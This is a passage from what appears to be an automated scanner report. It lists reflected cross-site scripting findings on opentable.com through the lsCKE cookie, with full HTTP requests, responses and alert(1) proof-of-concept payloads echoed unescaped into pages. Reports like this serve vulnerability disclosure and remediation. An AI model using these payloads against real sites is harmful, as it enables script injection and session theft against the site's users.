Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=8&vbefreg=8&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref3f96d"><script>alert(1)</script>5ac8eae4578&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=8&vbefreg=8&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV25wOFHxjGvbfxb0e%2fAJElb; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestref3f96d"><script>alert(1)</script>5ac8eae4578/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

3.22. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79263"-alert(1)-"082a2fb7275 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=20&vbefreg=20&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref79263"-alert(1)-"082a2fb7275&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=20&vbefreg=20&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV3LkCIYIt56OZ2ell2dPt4Y; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<!--
var s_account="otrestref79263"-alert(1)-"082a2fb7275";
//-->
...[SNIP]...

3.23. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41619"-alert(1)-"a26d3ee11 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestref41619"-alert(1)-"a26d3ee11";
//-->
...[SNIP]...

3.24. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e8f"><script>alert(1)</script>b73d6d090c was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
